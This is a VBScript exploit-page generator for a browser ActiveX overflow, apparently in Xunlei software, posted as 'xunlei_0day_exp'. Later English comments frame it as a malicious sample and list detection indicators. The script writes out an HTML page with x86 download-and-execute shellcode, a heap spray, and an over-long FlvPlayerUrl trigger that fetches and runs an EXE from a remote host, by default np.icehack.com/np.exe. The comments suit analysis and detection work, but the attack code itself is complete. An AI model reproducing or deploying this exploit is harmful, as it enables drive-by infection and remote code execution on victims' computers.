[vbs也写EXP]xunlei_0day_exp

来源:vbs空间


' Exploit-page generator (malicious sample, kept byte-identical for analysis).
' It prompts for a URL, then appends an HTML file that embeds an ActiveX object,
' a heap-spray routine and a download-and-run stub pointing at that URL.
' Indicators visible in this script, useful for detection/triage:
'   - the default payload URL in the prompt below
'   - the output file name "netpatch.htm" (written to the current directory)
'   - the cookie name "say_hello" used as a one-shot gate in the generated page
'   - the classid written into the <object> tag
'   - the property "FlvPlayerUrl" being assigned an over-long string
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
' Nothing is written when the prompt is cancelled or left empty.  The two
' helper functions declared inside this If block are still defined by the
' interpreter regardless of the branch taken.
if exeurl <> "" then
' Raw machine code as C-style "\xHH" escapes.  The bytes include the ASCII
' fragments "urlmon" and "\a.exe" -- NOTE(review): consistent with a stub that
' fetches the URL appended below and runs it, but this is inferred from the
' strings only; confirm by disassembly before relying on it.
code="\x43\x43\x43\x43\x43\x43\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f\x70"
' The user-supplied URL, NUL-terminated, is appended to the stub as its data.
down=exeurl&Chr(00)
' Encodes each character of str1 as "\xHH" using the hex value of its UTF-16
' code unit (AscW).  Because the result is always cut to the rightmost two hex
' digits, any code unit above &HFF loses its high byte.  The loop index i is not
' declared, so it becomes script-global (no Option Explicit in this file).
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function
' Rewrites consecutive pairs "\xAA\xBB" as "%uBBAA", the byte-swapped 16-bit
' form that JavaScript's unescape() expects.  A trailing unpaired "\xHH" is left
' unchanged.  regex and matches are undeclared and therefore script-global.
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
' Output file: mode 8 is ForAppending and the third argument creates the file
' if missing, so every run appends another full copy of the page.
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)

fileS.writeline "<SCRIPT language=""JavaScript"">"
' The expiry arithmetic below evaluates to 0, so the cookie's expiry equals the
' time it is set; how long it actually survives is browser-dependent.
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
' One-shot gate: the payload block runs only when the "say_hello" cookie is absent.
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
' Vulnerable ActiveX control instantiated by classid (indicator for web/proxy rules).
fileS.writeline "document.write('<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>');"
' Heap-spray section: the stub plus NUL-terminated URL are emitted as %u escapes
' and copied into many large strings.  The "%u0c0c%u0c0c" slide and the
' doubling loop in getSpraySlide are the recognisable signature.
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
' getSpraySlide is used above its definition; JavaScript hoists the declaration.
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
' Trigger: a string of at least 1070 characters of %0c is assigned to the
' control's FlvPlayerUrl property.  Mitigation is the vendor fix or a kill bit
' for the classid above; detection can key on classid + this property name.
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
' Closes the "if (set_cookie == -1){" block opened with the cookie write above.
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
' Second script: reloads the page once after the first pass so the gated block
' above observes the cookie on the second load.
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
' NOTE(review): "files.Close" is fused onto the end of the next line, most
' likely a lost line break in extraction; as printed it is a VBScript syntax
' error.  VBScript names are case-insensitive, so files and fileS are the
' same object.  Left as found.
fileS.writeline "</script>"files.Close
Set fso=nothing
' User-visible completion message ("generation finished").
msgbox "生成完毕!"
end if

